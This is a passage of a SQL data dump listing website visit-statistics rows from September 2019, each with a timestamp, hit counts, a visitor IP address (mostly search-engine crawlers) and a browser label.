','firefox'),(451303,1569339688,4,4,0,0,'66.249.66.136','chrome'),(451304,1569339767,1,1,0,0,'66.249.66.138','chrome'),(451305,1569340180,1,1,0,0,'8.29.198.27','other'),(451306,1569340359,2,2,0,0,'66.249.66.134','chrome'),(451307,1569340404,1,1,0,0,'77.222.143.222','msie'),(451308,1569340437,1,1,0,0,'8.29.198.26','other'),(451309,1569340587,1,1,0,0,'157.55.39.70','other'),(451310,1569340739,5,5,0,0,'66.249.66.136','chrome'),(451311,1569341037,1,1,0,0,'207.46.13.177','other'),(451312,1569341305,1,1,0,0,'66.249.66.138','chrome'),(451313,1569341307,2,2,0,0,'66.249.66.134','chrome'),(451314,1569342057,2,2,0,0,'66.249.66.68','chrome'),(451315,1569342336,2,2,0,0,'66.249.66.136','chrome'),(451316,1569342552,1,1,0,0,'157.55.39.70','other'),(451317,1569342645,5,5,0,0,'66.249.66.138','chrome'),(451318,1569342829,3,3,0,0,'66.249.66.134','chrome'),(451319,1569342857,1,1,0,0,'66.249.66.66','chrome'),(451320,1569343114,1,1,0,0,'207.46.13.177','other'),(451321,1569343670,1,1,0,0,'66.249.66.136','chrome'),(451322,1569344559,2,2,0,0,'66.249.66.134','chrome'),(451323,1569344793,1,1,0,0,'66.249.66.138','chrome'),(451324,1569345516,1,1,0,0,'66.249.66.66','chrome'),(451325,1569345525,3,3,0,0,'66.249.66.136','chrome'),(451326,1569345878,1,1,0,0,'141.8.188.29','other'),(451327,1569346474,2,2,0,0,'66.249.66.134','chrome'),(451328,1569346851,1,1,0,0,'66.249.66.136','chrome'),(451329,1569347593,4,4,0,0,'66.249.66.134','chrome'),(451330,1569347636,1,1,0,0,'66.249.66.64','chrome'),(451331,1569347670,2,2,0,0,'66.249.66.138','chrome'),(451332,1569347712,1,1,0,0,'207.46.13.177','other'),(451333,1569347783,1,1,0,0,'157.55.39.70','other'),(451334,1569347895,1,1,0,0,'207.46.13.105','other'),(451335,1569347942,1,1,0,0,'66.249.66.136','chrome'),(451336,1569348368,1,1,0,0,'66.249.66.66','chrome'),(451337,1569348662,3,3,0,0,'66.249.66.138','chrome'),(451338,1569348850,2,2,0,0,'66.249.66.136','chrome'),(451339,1569349466,1,1,0,0,'91.209.11.236','other'),(451340,1569349534,1,1,0,0,'66.249.66.134','chrome'),(451341,1569349835,1,1,0,0,'66.249.66.138','chrome'),(451342,1569350184,1,1,0,0,'66.249.66.64','chrome'),(451343,1569350588,2,2,0,0,'66.249.66.136','chrome'),(451344,1569350790,1,1,0,0,'66.249.66.138','chrome'),(451345,1569351043,2,2,0,0,'8.29.198.25','other'),(451346,1569351985,1,1,0,0,'157.55.39.70','other'),(451347,1569352455,1,1,0,0,'157.55.39.117','other'),(451348,1569353320,1,1,0,0,'66.249.66.68','chrome'),(451349,1569353844,3,3,0,0,'66.249.66.138','chrome'),(451350,1569353932,1,1,0,0,'157.55.39.109','other'),(451351,1569354145,1,1,0,0,'66.249.66.136','chrome'),(451352,1569354840,1,1,0,0,'66.249.66.134','chrome'),(451353,1569355056,1,1,0,0,'157.55.39.109','other'),(451354,1569355188,1,1,0,0,'207.46.13.126','other'),(451355,1569355831,1,1,0,0,'66.249.66.134','chrome'),(451356,1569355927,1,1,0,0,'157.55.39.108','other'),(451357,1569357796,1,1,0,0,'66.249.66.136','chrome'),(451358,1569358797,2,2,0,0,'66.249.66.138','chrome'),(451359,1569358802,1,1,0,0,'66.249.66.134','chrome'),(451360,1569358961,1,1,0,0,'209.17.96.178','other'),(451361,1569360335,2,2,0,0,'66.249.66.138','chrome'),(451362,1569361896,2,2,0,0,'8.29.198.26','other'),(451363,1569362384,1,1,0,0,'66.249.66.138','chrome'),(451364,1569363023,1,1,0,0,'66.249.66.64','chrome'),(451365,1569363198,2,2,0,0,'13.66.139.0','other'),(451366,1569363208,1,1,0,0,'66.249.66.134','chrome'),(451367,1569363389,1,1,0,0,'66.249.66.138','chrome'),(451368,1569364005,1,1,0,0,'178.158.248.67','chrome'),(451369,1569364066,1,1,0,0,'66.249.66.68','chrome'),(451370,1569364737,1,1,0,0,'91.209.11.236','other'),(451371,1569365174,1,1,0,0,'66.249.66.138','chrome'),(451372,1569365352,1,1,0,0,'141.8.188.11','other'),(451373,1569365953,1,1,0,0,'40.77.167.170','other'),(451374,1569366820,1,1,0,0,'141.8.188.29','other'),(451375,1569367564,1,1,0,0,'207.46.13.242','other'),(451376,1569367840,1,1,0,0,'207.46.13.15','other'),(451377,1569368191,1,1,0,0,'37.9.113.20','other'),(451378,1569369635,1,1,0,0,'141.8.142.103','other'),(451379,1569370818,1,1,0,0,'95.108.181.75','other'),(451380,1569371074,1,1,0,0,'157.55.39.147','other'),(451381,1569372090,1,1,0,0,'141.8.188.29','chrome'),(451382,1569372162,1,1,0,0,'95.108.213.4','other'),(451383,1569372754,1,1,0,0,'8.29.198.25','other'),(451384,1569372819,1,1,0,0,'91.209.11.236','other'),(451385,1569373007,1,1,0,0,'8.29.198.26','other'),(451386,1569373217,1,1,0,0,'66.249.66.66','chrome'),(451387,1569374543,1,1,0,0,'87.250.224.65','other'),(451388,1569374783,1,1,0,0,'66.249.66.136','chrome'),(451389,1569375752,1,1,0,0,'141.8.188.65','other'),(451390,1569375797,1,1,0,0,'157.55.39.73','other'),(451391,1569376079,1,1,0,0,'66.249.66.136','chrome'),(451392,1569377349,1,1,0,0,'157.55.39.135','other'),(451393,1569377589,1,1,0,0,'157.55.39.182','other'),(451394,1569377951,1,1,0,0,'141.8.188.29','other'),(451395,1569378061,1,1,0,0,'141.8.188.11','other'),(451396,1569378676,2,2,0,0,'66.249.66.134','chrome'),(451397,1569378722,1,1,0,0,'66.249.66.136','chrome'),(451398,1569379190,1,1,0,0,'66.249.66.64','chrome'),(451399,1569379611,1,1,0,0,'157.55.39.182','other'),(451400,1569379753,1,1,0,0,'91.196.178.75','chrome'),(451401,1569380126,1,1,0,0,'66.249.66.68','chrome'),(451402,1569380430,1,1,0,0,'87.250.224.47','other'),(451403,1569381185,1,1,0,0,'157.55.39.219','other'),(451404,1569381522,1,1,0,0,'178.154.171.60','other'),(451405,1569381536,1,1,0,0,'37.9.113.103','chrome'),(451406,1569381597,1,1,0,0,'95.108.213.4','other'),(451407,1569381987,1,1,0,0,'207.46.13.32','other'),(451408,1569382120,2,2,0,0,'66.249.66.138','chrome'),(451409,1569383135,1,1,0,0,'207.46.13.156','other'),(451410,1569383272,1,1,0,0,'66.249.66.138','chrome'),(451411,1569383460,1,1,0,0,'141.8.142.162','other'),(451412,1569383608,2,2,0,0,'8.29.198.25','other'),(451413,1569383611,1,1,0,0,'66.249.66.68','chrome'),(451414,1569384306,1,1,0,0,'66.249.66.64','chrome'),(451415,1569384350,1,1,0,0,'46.211.101.192','chrome'),(451416,1569384683,1,1,0,0,'141.8.188.11','other'),(451417,1569384916,1,1,0,0,'207.46.13.156','other'),(451418,1569385177,1,1,0,0,'5.45.207.79','other'),(451419,1569386337,1,1,0,0,'5.45.207.79','other'),(451420,1569386474,1,1,0,0,'66.249.66.66','chrome'),(451421,1569386517,1,1,0,0,'157.55.39.73','other'),(451422,1569386680,1,1,0,0,'62.205.134.182','other'),(451423,1569386734,1,1,0,0,'66.249.66.136','chrome'),(451424,1569387192,1,1,0,0,'207.46.13.47','other'),(451425,1569387551,1,1,0,0,'91.209.11.236','other'),(451426,1569387699,1,1,0,0,'207.46.13.80','other'),(451427,1569389816,1,1,0,0,'66.249.66.134','chrome'),(451428,1569389975,2,2,0,0,'141.8.188.29','other'),(451429,1569390031,1,1,0,0,'141.8.188.11','other'),(451430,1569391069,1,1,0,0,'37.9.113.148','chrome'),(451431,1569391099,1,1,0,0,'37.9.113.103','other'),(451432,1569391104,1,1,0,0,'141.8.188.29','other'),(451433,1569392147,1,1,0,0,'141.8.142.103','other'),(451434,1569392846,1,1,0,0,'91.196.178.73','chrome'),(451435,1569392851,1,1,0,0,'207.46.13.156','other'),(451436,1569393307,2,2,0,0,'40.77.167.53','other'),(451437,1569393487,1,1,0,0,'66.249.66.134','chrome'),(451438,1569394481,1,1,0,0,'8.29.198.26','other'),(451439,1569394626,1,1,0,0,'141.8.188.29','chrome'),(451440,1569394738,1,1,0,0,'8.29.198.25','other'),(451441,1569395218,1,1,0,0,'66.249.66.64','chrome'),(451442,1569396541,2,2,0,0,'66.249.66.134','chrome'),(451443,1569396703,3,3,0,0,'40.77.167.12','other'),(451444,1569396708,2,2,0,0,'40.77.167.53','other'),(451445,1569397047,1,1,0,0,'93.119.227.91','other'),(451447,1569397048,1,1,0,0,'69.4.87.74','firefox'),(451449,1569397705,1,1,0,0,'66.249.66.138','chrome'),(451450,1569397741,1,1,0,0,'66.249.66.134','chrome'),(451451,1569398193,1,1,0,0,'52.59.102.42','chrome'),(451452,1569398199,1,1,0,0,'52.28.3.120','other'),(451453,1569398792,1,1,0,0,'66.249.66.136','chrome'),(451454,1569398825,1,1,0,0,'207.46.13.26','other'),(451455,1569398840,2,2,0,0,'66.249.66.138','chrome'),(451456,1569398937,1,1,0,0,'66.249.66.134','chrome'),(451457,1569399776,1,1,0,0,'66.249.66.68','chrome'),(451458,1569400277,1,1,0,0,'178.20.152.18','firefox'),(451459,1569401406,1,1,0,0,'91.196.178.73','chrome'),(451460,1569401432,1,1,0,0,'91.196.177.15','chrome'),(451461,1569401806,3,3,0,0,'66.249.66.134','chrome'),(451462,1569401933,1,1,0,0,'66.249.66.132','chrome'),(451463,1569403424,1,1,0,0,'87.250.224.90','chrome'),(451464,1569403428,1,1,0,0,'178.154.200.33','other'),(451465,1569403435,1,1,0,0,'141.8.142.161','chrome'),(451466,1569403773,1,1,0,0,'66.249.66.134','chrome'),(451467,1569403807,1,1,0,0,'37.73.165.167','chrome'),(451468,1569404078,1,1,0,0,'66.249.66.88','chrome'),(451469,1569404447,1,1,0,0,'37.55.38.217','chrome'),(451470,1569404517,2,2,0,0,'213.180.203.37','other'),(451471,1569405331,2,2,0,0,'8.29.198.26','other'),(451472,1569405496,1,1,0,0,'91.196.178.73','chrome'),(451473,1569405590,1,1,0,0,'8.29.198.25','other'),(451474,1569405727,1,1,0,0,'213.180.203.44','other'),(451475,1569406131,1,1,0,0,'18.144.72.147','chrome'),(451476,1569406138,9,9,0,0,'52.53.241.100','chrome'),(451477,1569406139,1,1,0,0,'54.153.72.31','chrome'),(451478,1569406691,1,1,0,0,'91.196.178.186','chrome'),(451479,1569408159,2,2,0,0,'213.180.203.44','other'),(451480,1569408241,2,2,0,0,'95.213.141.126','opera'),(451481,1569408480,1,1,0,0,'46.211.129.126','chrome'),(451482,1569408525,1,1,0,0,'109.74.154.72','chrome'),(451483,1569408908,1,1,0,0,'52.162.161.148','other'),(451484,1569409616,2,2,0,0,'213.180.203.44','other'),(451485,1569409768,1,1,0,0,'66.249.66.136','chrome'),(451486,1569410535,1,1,0,0,'157.55.39.148','other'),(451487,1569410728,5,5,0,0,'78.46.176.21','other'),(451488,1569411062,1,1,0,0,'91.196.178.186','chrome'),(451489,1569411548,1,1,0,0,'91.196.177.15','chrome'),(451490,1569411713,1,1,0,0,'91.196.178.73','chrome'),(451491,1569411867,1,1,0,0,'87.250.224.90','chrome'),(451492,1569411871,2,2,0,0,'213.180.203.44','other'),(451493,1569411913,1,1,0,0,'213.180.203.37','other'),(451494,1569412923,1,1,0,0,'94.230.208.147','msie'),(451495,1569415799,1,1,0,0,'213.180.203.44','chrome'),(451496,1569416181,2,2,0,0,'8.29.198.26','other'),(451497,1569416618,2,2,0,0,'164.68.119.249','other'),(451498,1569417063,2,2,0,0,'213.180.203.44','other'),(451499,1569417074,1,1,0,0,'141.8.142.2','other'),(451500,1569418339,1,1,0,0,'141.8.142.2','other'),(451501,1569418399,1,1,0,0,'207.46.13.42','other'),(451502,1569418403,1,1,0,0,'141.8.142.161','chrome'),(451503,1569418691,1,1,0,0,'91.196.178.73','chrome'),(451504,1569418892,1,1,0,0,'77.222.143.222','msie'),(451505,1569419620,1,1,0,0,'213.180.203.44','other'),(451506,1569420566,1,1,0,0,'147.135.252.34','msie'),(451507,1569420973,1,1,0,0,'213.180.203.37','chrome'),(451508,1569421279,1,1,0,0,'207.46.13.42','other'),(451509,1569422104,1,1,0,0,'91.196.178.73','chrome'),(451510,1569422340,1,1,0,0,'213.180.203.44','chrome'),(451511,1569422413,1,1,0,0,'37.9.113.10','other'),(451512,1569422485,1,1,0,0,'213.180.203.44','other'),(451513,1569422720,1,1,0,0,'207.46.13.42','other'),(451514,1569423086,1,1,0,0,'35.226.182.205','chrome'),(451515,1569423171,3,3,0,0,'34.68.194.153','chrome'),(451516,1569423189,4,4,0,0,'34.68.212.90','chrome'),(451517,1569423785,1,1,0,0,'207.46.13.94','other'),(451518,1569424347,1,1,0,0,'91.196.178.166','chrome'),(451519,1569424794,1,1,0,0,'31.13.127.20','other'),(451520,1569425706,1,1,0,0,'66.249.66.136','chrome'),(451521,1569426565,1,1,0,0,'40.77.167.139','other'),(451522,1569427062,2,2,0,0,'8.29.198.25','other'),(451523,1569430280,1,1,0,0,'109.251.152.51','chrome'),(451524,1569430308,1,1,0,0,'207.46.13.103','other'),(451525,1569430835,1,1,0,0,'66.249.66.134','chrome'),(451526,1569433768,1,1,0,0,'66.249.66.136','chrome'),(451527,1569434095,1,1,0,0,'157.55.39.49','other'),(451528,1569435914,1,1,0,0,'40.77.167.162','other'),(451529,1569436022,1,1,0,0,'207.46.13.103','other'),(451530,1569436240,1,1,0,0,'157.55.39.194','other'),(451531,1569437911,1,1,0,0,'8.29.198.25','other'),(451532,1569438236,1,1,0,0,'8.29.198.26','other'),(451533,1569438644,1,1,0,0,'66.249.66.136','chrome'),(451534,1569439262,1,1,0,0,'207.46.13.103','other'),(451535,1569439503,1,1,0,0,'157.55.39.49','other'),(451536,1569439550,3,3,0,0,'66.249.66.134','chrome'),(451537,1569440335,2,2,0,0,'66.249.66.86','chrome'),(451538,1569440795,2,2,0,0,'66.249.66.136','chrome'),(451539,1569440858,1,1,0,0,'66.249.66.134','chrome'),(451540,1569442220,2,2,0,0,'66.249.66.136','chrome'),(451541,1569442563,1,1,0,0,'37.9.113.177','other'),(451542,1569442647,1,1,0,0,'141.8.142.2','other'),(451543,1569444924,1,1,0,0,'91.209.11.236','other'),(451544,1569445040,1,1,0,0,'178.154.200.33','other'),(451545,1569445111,1,1,0,0,'178.154.200.71','chrome'),(451546,1569445876,1,1,0,0,'66.249.66.134','chrome'),(451547,1569446308,1,1,0,0,'141.8.142.119','chrome'),(451548,1569447123,1,1,0,0,'207.46.13.252','other'),(451549,1569447684,1,1,0,0,'66.249.66.134','chrome'),(451550,1569447928,1,1,0,0,'181.229.239.151','firefox'),(451551,1569448762,1,1,0,0,'8.29.198.26','other'),(451552,1569449088,1,1,0,0,'8.29.198.27','other'),(451553,1569449190,1,1,0,0,'40.77.167.93','other'),(451554,1569449385,1,1,0,0,'141.8.142.2','other'),(451555,1569449496,1,1,0,0,'66.249.66.132','chrome'),(451556,1569449816,1,1,0,0,'141.8.188.12','other'),(451557,1569449840,1,1,0,0,'5.45.207.65','other'),(451558,1569450181,1,1,0,0,'37.9.113.163','other'),(451559,1569450491,1,1,0,0,'66.249.66.134','chrome'),(451560,1569451604,1,1,0,0,'66.249.66.136','chrome'),(451561,1569451803,1,1,0,0,'178.154.200.71','other'),(451562,1569452122,1,1,0,0,'178.154.200.33','other'),(451563,1569452167,1,1,0,0,'87.250.224.90','other'),(451564,1569452183,1,1,0,0,'37.9.113.10','other'),(451565,1569452227,1,1,0,0,'66.249.66.132','chrome'),(451566,1569452691,1,1,0,0,'37.9.113.177','other'),(451567,1569453195,1,1,0,0,'66.249.66.132','chrome'),(451568,1569453259,1,1,0,0,'213.180.203.44','chrome'),(451569,1569453661,1,1,0,0,'66.249.66.136','chrome'),(451570,1569454659,2,2,0,0,'66.249.66.132','chrome'),(451571,1569455313,1,1,0,0,'66.249.66.86','chrome'),(451572,1569455607,2,2,0,0,'93.119.227.34','other'),(451573,1569455712,1,1,0,0,'62.205.134.182','other'),(451574,1569456109,1,1,0,0,'213.180.203.37','chrome'),(451575,1569456929,1,1,0,0,'162.243.162.201','firefox'),(451576,1569457389,1,1,0,0,'207.46.13.85','other'),(451577,1569457882,1,1,0,0,'66.249.66.132','chrome'),(451578,1569458433,1,1,0,0,'178.154.200.33','other'),(451579,1569458585,2,2,0,0,'66.249.66.136','chrome'),(451580,1569459604,1,1,0,0,'66.249.66.132','chrome'),(451581,1569459644,2,2,0,0,'8.29.198.25','other'),(451582,1569459657,1,1,0,0,'66.249.66.134','chrome'),(451583,1569460557,1,1,0,0,'66.249.66.132','chrome'),(451584,1569460899,2,2,0,0,'213.180.203.44','other'),(451585,1569461434,1,1,0,0,'66.249.66.134','chrome'),(451586,1569462296,1,1,0,0,'207.46.13.28','other'),(451587,1569462436,1,1,0,0,'207.46.13.88','other'),(451588,1569462513,1,1,0,0,'87.250.224.90','chrome'),(451589,1569462600,1,1,0,0,'213.180.203.44','other'),(451590,1569463074,1,1,0,0,'157.55.39.210','other'),(451591,1569463714,1,1,0,0,'207.46.13.88','other'),(451592,1569463918,1,1,0,0,'141.8.142.115','other'),(451593,1569463979,1,1,0,0,'207.46.13.85','other'),(451594,1569464464,1,1,0,0,'37.9.113.10','other'),(451595,1569464789,1,1,0,0,'157.55.39.210','other'),(451596,1569465072,1,1,0,0,'178.154.200.71','other'),(451597,1569465501,1,1,0,0,'207.46.13.85','other'),(451598,1569466264,1,1,0,0,'37.9.113.10','chrome'),(451599,1569466357,1,1,0,0,'66.249.66.88','chrome'),(451600,1569466698,1,1,0,0,'141.8.132.19','other'),(451601,1569467241,1,1,0,0,'66.249.66.134','chrome'),(451602,1569468004,1,1,0,0,'66.249.66.86','chrome'),(451603,1569468081,1,1,0,0,'157.55.39.210','other'),(451604,1569468216,2,2,0,0,'66.249.66.132','chrome'),(451605,1569468346,1,1,0,0,'207.46.13.88','other'),(451606,1569468569,1,1,0,0,'207.46.13.87','other'),(451607,1569468733,1,1,0,0,'66.249.66.134','chrome'),(451608,1569469084,1,1,0,0,'37.9.113.33','other'),(451609,1569470186,1,1,0,0,'40.77.167.101','other'),(451610,1569470370,1,1,0,0,'66.249.66.132','chrome'),(451611,1569470421,1,1,0,0,'66.249.66.134','chrome'),(451612,1569470473,1,1,0,0,'141.8.188.12','other'),(451613,1569470513,1,1,0,0,'8.29.198.27','other'),(451614,1569470597,1,1,0,0,'141.8.132.12','other'),(451615,1569470687,1,1,0,0,'157.55.39.210','other'),(451616,1569471224,1,1,0,0,'8.29.198.25','other'),(451617,1569471631,1,1,0,0,'66.249.66.88','chrome'),(451618,1569472055,1,1,0,0,'141.8.132.12','other'),(451619,1569472302,2,2,0,0,'66.249.66.132','chrome'),(451620,1569472320,1,1,0,0,'5.45.207.65','other'),(451621,1569472323,1,1,0,0,'141.8.142.50','other'),(451622,1569472816,1,1,0,0,'66.249.66.134','chrome'),(451623,1569473549,1,1,0,0,'178.154.200.33','chrome'),(451624,1569473942,2,2,0,0,'66.249.66.136','chrome'),(451625,1569474054,2,2,0,0,'207.46.13.87','other'),(451626,1569474058,1,1,0,0,'207.46.13.88','other'),(451627,1569474131,1,1,0,0,'157.55.39.210','other'),(451628,1569474245,2,2,0,0,'66.249.66.132','chrome'),(451629,1569474376,1,1,0,0,'91.196.178.62','chrome'),(451630,1569475296,1,1,0,0,'158.46.223.48','chrome'),(451631,1569475301,1,1,0,0,'195.177.72.236','firefox'),(451632,1569475991,1,1,0,0,'128.75.48.223','msie'),(451633,1569475994,1,1,0,0,'46.188.33.126','msie'),(451634,1569476450,1,1,0,0,'128.124.189.214','chrome'),(451635,1569476977,1,1,0,0,'66.249.66.136','chrome'),(451636,1569477672,1,1,0,0,'46.4.33.48','other'),(451637,1569478164,1,1,0,0,'91.196.178.85','chrome'),(451638,1569478206,2,2,0,0,'66.249.66.134','chrome'),(451639,1569478829,1,1,0,0,'207.46.13.111','other'),(451640,1569478918,2,2,0,0,'66.249.66.132','chrome'),(451641,1569479335,1,1,0,0,'46.96.56.115','other'),(451642,1569479500,1,1,0,0,'66.249.66.86','chrome'),(451643,1569480455,2,2,0,0,'91.196.178.85','chrome'),(451644,1569481258,1,1,0,0,'207.46.13.111','other'),(451645,1569481361,1,1,0,0,'207.46.13.87','other'),(451646,1569481375,2,2,0,0,'8.29.198.25','other'),(451647,1569482248,1,1,0,0,'141.8.142.164','other'),(451648,1569482634,2,2,0,0,'157.55.39.9','other'),(451649,1569482692,1,1,0,0,'207.46.13.88','other'),(451650,1569483032,1,1,0,0,'157.55.39.160','other'),(451651,1569483823,1,1,0,0,'31.13.127.16','other'),(451652,1569484901,1,1,0,0,'134.249.146.125','chrome'),(451653,1569484982,1,1,0,0,'77.111.247.62','chrome'),(451654,1569485317,1,1,0,0,'141.8.183.18','chrome'),(451655,1569485328,1,1,0,0,'91.196.178.186','chrome'),(451656,1569485803,1,1,0,0,'141.8.132.12','other'),(451657,1569485818,1,1,0,0,'91.196.178.85','chrome'),(451658,1569486251,1,1,0,0,'141.8.132.37','other'),(451659,1569486346,1,1,0,0,'95.108.213.39','other'),(451660,1569486425,1,1,0,0,'66.249.66.132','chrome'),(451661,1569486477,1,1,0,0,'95.108.213.3','other'),(451662,1569486591,1,1,0,0,'66.249.66.134','chrome'),(451663,1569487192,1,1,0,0,'66.249.66.136','chrome'),(451664,1569487493,1,1,0,0,'54.208.102.37','other'),(451665,1569487494,1,1,0,0,'107.21.1.8','other'),(451666,1569488094,1,1,0,0,'37.73.198.106','chrome'),(451667,1569488232,1,1,0,0,'92.243.104.76','chrome'),(451668,1569489009,1,1,0,0,'66.249.66.88','chrome'),(451669,1569489766,1,1,0,0,'66.249.66.86','chrome'),(451670,1569489869,2,2,0,0,'212.62.207.170','other'),(451671,1569489881,1,1,0,0,'5.45.207.65','other'),(451672,1569490079,1,1,0,0,'66.249.66.134','chrome'),(451673,1569490152,1,1,0,0,'66.249.66.132','chrome'),(451674,1569490335,1,1,0,0,'91.196.178.85','chrome'),(451675,1569490482,1,1,0,0,'95.108.213.3','chrome'),(451676,1569490583,1,1,0,0,'141.8.142.2','other'),(451677,1569490587,1,1,0,0,'178.154.200.33','other'),(451678,1569490841,1,1,0,0,'95.134.189.48','chrome'),(451679,1569490853,1,1,0,0,'37.9.113.177','other'),(451680,1569490867,1,1,0,0,'66.249.66.136','chrome'),(451681,1569490886,1,1,0,0,'109.74.154.72','chrome'),(451682,1569491445,1,1,0,0,'66.249.66.132','chrome'),(451683,1569491618,1,1,0,0,'95.108.213.3','other'),(451684,1569491913,1,1,0,0,'5.255.253.8','chrome'),(451685,1569492267,1,1,0,0,'8.29.198.25','other'),(451686,1569492486,1,1,0,0,'212.22.214.145','chrome'),(451687,1569492589,1,1,0,0,'66.249.66.136','chrome'),(451688,1569492610,2,2,0,0,'66.249.66.132','chrome'),(451689,1569492929,1,1,0,0,'8.29.198.27','other'),(451690,1569493143,1,1,0,0,'141.8.132.12','other'),(451691,1569493149,2,2,0,0,'66.249.66.134','chrome'),(451692,1569493303,1,1,0,0,'150.95.52.71','firefox'),(451693,1569494198,1,1,0,0,'157.55.39.11','other'),(451694,1569495026,1,1,0,0,'141.8.183.15','other'),(451695,1569495144,1,1,0,0,'66.249.66.134','chrome'),(451696,1569495178,1,0,1,0,'148.251.53.172',''),(451697,1569495220,1,1,0,0,'213.180.203.44','other'),(451698,1569495724,2,2,0,0,'66.249.66.132','chrome'),(451699,1569496114,1,1,0,0,'157.55.39.160','other'),(451700,1569496120,1,1,0,0,'157.55.39.9','other'),(451701,1569496147,2,2,0,0,'66.249.66.134','chrome'),(451702,1569496853,1,1,0,0,'37.9.113.177','other'),(451703,1569497338,1,1,0,0,'83.170.203.202','chrome'),(451704,1569497784,1,0,1,0,'66.249.66.134',''),(451705,1569498071,1,1,0,0,'178.154.200.60','other'),(451706,1569498513,1,1,0,0,'66.249.66.132','chrome'),(451707,1569499498,1,1,0,0,'91.196.178.85','chrome'),(451708,1569499776,1,1,0,0,'178.154.200.71','other'),(451709,1569499971,1,1,0,0,'66.249.66.132','chrome'),(451710,1569500298,1,1,0,0,'141.8.132.12','other'),(451711,1569500306,1,1,0,0,'37.9.113.33','other'),(451712,1569501348,1,1,0,0,'37.9.113.10','other'),(451713,1569501454,1,1,0,0,'141.8.142.50','chrome'),(451714,1569501457,1,1,0,0,'178.154.200.60','other'),(451715,1569501922,1,1,0,0,'141.8.183.15','other'),(451716,1569502846,2,2,0,0,'157.55.39.68','other'),(451717,1569503153,1,1,0,0,'8.29.198.27','other'),(451718,1569503338,2,2,0,0,'66.249.66.136','chrome'),(451719,1569503832,1,1,0,0,'8.29.198.25','other'),(451720,1569504145,1,1,0,0,'157.55.39.160','other'),(451721,1569504167,1,1,0,0,'91.196.178.131','firefox'),(451722,1569504277,1,1,0,0,'66.249.66.136','chrome'),(451723,1569504716,1,1,0,0,'46.211.225.77','chrome'),(451724,1569504831,1,1,0,0,'37.9.113.10','other'),(451725,1569504897,1,1,0,0,'37.9.113.163','other'),(451726,1569504961,1,1,0,0,'141.8.142.164','other'),(451727,1569505535,1,1,0,0,'178.92.215.72','chrome'),(451728,1569505993,1,1,0,0,'141.8.132.19','other'),(451729,1569507170,3,3,0,0,'66.249.66.132','chrome'),(451730,1569507511,1,1,0,0,'95.108.213.3','chrome'),(451731,1569507734,1,1,0,0,'66.249.66.136','chrome'),(451732,1569507780,1,1,0,0,'37.9.113.33','other'),(451733,1569507793,1,1,0,0,'66.249.66.86','chrome'),(451734,1569508123,1,1,0,0,'91.196.178.104','chrome'),(451735,1569508322,1,1,0,0,'13.66.139.0','other'),(451736,1569508812,1,1,0,0,'95.108.213.39','other'),(451737,1569508817,1,1,0,0,'157.55.39.160','other'),(451738,1569509537,3,3,0,0,'35.238.89.158','chrome'),(451739,1569509604,3,3,0,0,'35.184.98.4','chrome'),(451740,1569509619,2,2,0,0,'34.66.168.186','chrome'),(451742,1569509631,3,3,0,0,'34.66.37.44','chrome'),(451743,1569509650,3,3,0,0,'35.192.11.200','chrome'),(451744,1569509885,1,1,0,0,'91.196.178.83','chrome'),(451745,1569510113,1,1,0,0,'141.8.142.164','chrome'),(451746,1569510252,1,1,0,0,'66.249.66.134','chrome'),(451747,1569511696,1,1,0,0,'87.250.224.90','chrome'),(451748,1569511746,1,1,0,0,'104.36.18.163','chrome'),(451749,1569511825,1,1,0,0,'91.196.178.174','chrome'),(451750,1569513764,1,1,0,0,'66.249.66.132','chrome'),(451751,1569513845,1,1,0,0,'54.145.127.107','chrome'),(451752,1569514035,1,1,0,0,'8.29.198.27','other'),(451753,1569514418,1,1,0,0,'91.196.178.174','chrome'),(451754,1569514532,1,1,0,0,'66.249.66.136','chrome'),(451755,1569514766,1,1,0,0,'8.29.198.26','other'),(451756,1569515731,1,1,0,0,'184.94.240.92','firefox'),(451757,1569515794,1,1,0,0,'66.249.66.132','chrome'),(451758,1569517071,1,1,0,0,'91.196.178.165','chrome'),(451759,1569517624,1,1,0,0,'66.249.66.134','chrome'),(451760,1569518486,1,1,0,0,'95.108.213.55','other'),(451761,1569518531,1,1,0,0,'178.154.200.13','other'),(451762,1569520864,1,1,0,0,'141.8.142.164','other'),(451763,1569520991,1,1,0,0,'91.196.178.75','chrome'),(451764,1569521881,1,1,0,0,'54.188.164.138','chrome'),(451765,1569522095,1,1,0,0,'141.8.183.15','other'),(451766,1569522208,1,1,0,0,'66.249.66.134','chrome'),(451767,1569522511,1,1,0,0,'66.249.66.86','chrome'),(451768,1569523151,1,1,0,0,'95.108.213.3','other'),(451769,1569524635,1,1,0,0,'37.9.113.6','other'),(451770,1569524654,1,1,0,0,'213.180.203.44','other'),(451771,1569524907,2,2,0,0,'8.29.198.25','other'),(451772,1569526053,2,2,0,0,'66.249.66.136','chrome'),(451773,1569526369,1,1,0,0,'66.249.66.134','chrome'),(451774,1569527126,1,1,0,0,'66.249.66.136','chrome'),(451775,1569527614,1,1,0,0,'5.255.253.8','chrome'),(451776,1569527698,1,1,0,0,'5.45.207.65','other'),(451777,1569527785,1,1,0,0,'37.9.113.33','other'),(451778,1569528834,1,1,0,0,'91.196.178.8','chrome'),(451779,1569529379,1,1,0,0,'141.8.132.2','other'),(451780,1569529476,1,1,0,0,'87.250.224.118','chrome'),(451781,1569532006,1,1,0,0,'13.66.139.0','other'),(451782,1569533042,1,1,0,0,'37.9.113.177','other'),(451783,1569533802,1,1,0,0,'213.180.203.44','chrome'),(451784,1569535783,2,2,0,0,'8.29.198.27','other'),(451785,1569539582,1,1,0,0,'66.249.66.132','chrome'),(451786,1569539745,1,1,0,0,'13.66.139.0','other'),(451787,1569539990,1,1,0,0,'66.249.66.136','chrome'),(451788,1569540712,1,1,0,0,'66.249.66.132','chrome'),(451789,1569541654,1,1,0,0,'66.249.66.132','chrome'),(451790,1569542111,1,1,0,0,'62.205.134.182','other'),(451791,1569542560,1,1,0,0,'66.249.66.134','chrome'),(451792,1569542700,1,1,0,0,'207.46.13.175','other'),(451793,1569544855,1,1,0,0,'178.154.200.60','other'),(451794,1569545522,1,1,0,0,'141.8.188.12','chrome'),(451795,1569545531,1,1,0,0,'178.154.200.13','other'),(451796,1569545587,1,1,0,0,'141.8.188.25','other'),(451797,1569545593,1,1,0,0,'141.8.132.37','other'),(451798,1569545604,1,1,0,0,'141.8.132.19','other'),(451799,1569545619,1,1,0,0,'5.255.253.8','other'),(451800,1569546001,2,2,0,0,'157.55.39.156','other'),(451801,1569546641,1,1,0,0,'8.29.198.27','other'),(451802,1569546763,2,2,0,0,'178.154.200.71','other'),(451803,1569547371,1,1,0,0,'8.29.198.25','other'),(451804,1569547901,1,1,0,0,'213.180.203.44','other'),(451805,1569547919,1,1,0,0,'213.180.